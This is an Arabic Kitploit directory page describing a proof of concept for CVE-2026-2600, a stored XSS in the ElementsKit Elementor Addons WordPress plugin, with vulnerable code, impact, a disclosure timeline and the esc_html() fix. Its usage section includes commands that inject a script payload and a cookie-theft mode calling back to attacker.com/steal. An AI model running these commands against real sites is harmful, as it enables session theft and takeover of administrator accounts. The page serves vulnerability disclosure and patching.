Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-2600-POC — إثبات مفهوم لاستغلال CVE-2026-2600، وهو XSS مخزّن في ElementsKit Elementor Addons <= 3.7.9، مما يسمح للمساهمين المُصادَق عليهم بحقن نصوص برمجية عشوائية عبر بيانات Elementor مُصمَّمة خصيصًا. | Kitploit
أدوات/GitHubGitHub/folks-iwd/cve-2026-2600-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

إثبات مفهوم لاستغلال CVE-2026-2600، وهو XSS مخزّن في ElementsKit Elementor Addons <= 3.7.9، مما يسمح للمساهمين المُصادَق عليهم بحقن نصوص برمجية عشوائية عبر بيانات Elementor مُصمَّمة خصيصًا.

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — ثغرة تخزين البرمجة النصية عبر المواقع (XSS) للمستخدمين المصادق عليهم (مساهم+)

CVSS6.4 متوسطة
الإصدارات المتأثرة<= 3.7.9
الإصدار المُصحَّح3.8.0
الحد الأدنى للصلاحيةمساهم (edit_posts)
ناقل الهجومشبكة / تعقيد منخفض / صلاحيات منخفضة

الثغرة

يعرض ودجت Simple Tab عناوين التبويبات باستخدام HTML عبر echo دون أي تهريب للمخرجات. في widgets/tab/tab.php، تقوم حلقة العرض بما يلي:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

يقوم محرر Elementor بتعقيم المدخلات على جانب العميل، لكن نقطة نهاية REST API (/wp-json/wp/v2/posts/{id}) تقبل حقل البيانات الوصفية _elementor_data مباشرة وتتجاوز تلك الطبقة بالكامل.

يمكن لأي مساهم مصادق عليه إرسال طلب PATCH لمنشور مع حمولة JSON خاصة بـ Elementor تُعيّن ekit_tab_title إلى HTML عشوائي. ولأن القيمة تُخزَّن حرفيًا في _elementor_data وتُعرض عبر echo دون esc_html() وقت العرض، يتم تنفيذ البرنامج النصي في متصفح كل زائر عند تحميل الصفحة.

التأثير

يمكن لأي مساهم:

  • سرقة ملفات تعريف الارتباط للجلسات ورموز المصادقة من جميع زوار الموقع، بما في ذلك المسؤولين
  • اختطاف حسابات المسؤولين والتصعيد إلى السيطرة الكاملة على الموقع
  • نشر برامج تسجيل ضغطات المفاتيح أو طبقات جمع بيانات الاعتماد بصمت
  • إعادة توجيه الزوار إلى صفحات تصيد أو مواقع توزيع برمجيات خبيثة
  • تشويه الصفحات بشكل دائم — تبقى الحمولة حتى يتم إزالتها يدويًا

تأثر أكثر من 400 ألف تثبيت نشط وقت الإفصاح.

الاستخدام

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

يقوم البرنامج النصي بالمصادقة عبر HTTP، ويجلب رمز REST المميز من محرر لوحة التحكم، وينشئ منشورًا مسودة، ويُرسل PATCH إلى _elementor_data مع حمولة XSS المدمجة في حقل ekit_tab_title، ثم ينشر المنشور. يؤكد المخرَج ما إذا كانت الحمولة نشطة في مصدر الصفحة.

root@kitploit:~
# حمولة مخصصة
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# استخراج ملفات تعريف الارتباط مع رد اتصال
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# وضع وحدة التحكم التفاعلية
python3 console_poc.py

التقرير الكامل

https://folks-iwd.github.io/writeups/cve-2026-2600.html

الجدول الزمني للإفصاح

التاريخالحدث
يناير 2026اكتُشفت عبر مراجعة فروقات SVN. تم تأكيد إثبات المفهوم (PoC).
يناير 2026أُبلغت إلى Patchstack Alliance مع التقرير الكامل وإثبات المفهوم.
مارس 2026أصدرت Wpmet الإصلاح في الإصدار v3.8.0.
أبريل 2026نُشرت CVE-2026-2600. تم تعيين درجة CVSS 6.4 متوسطة.

الإصلاح

أضافت Wpmet دالة esc_html() حول مخرجات عنوان التبويب في widgets/tab/tab.php:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
تنزيل الأداة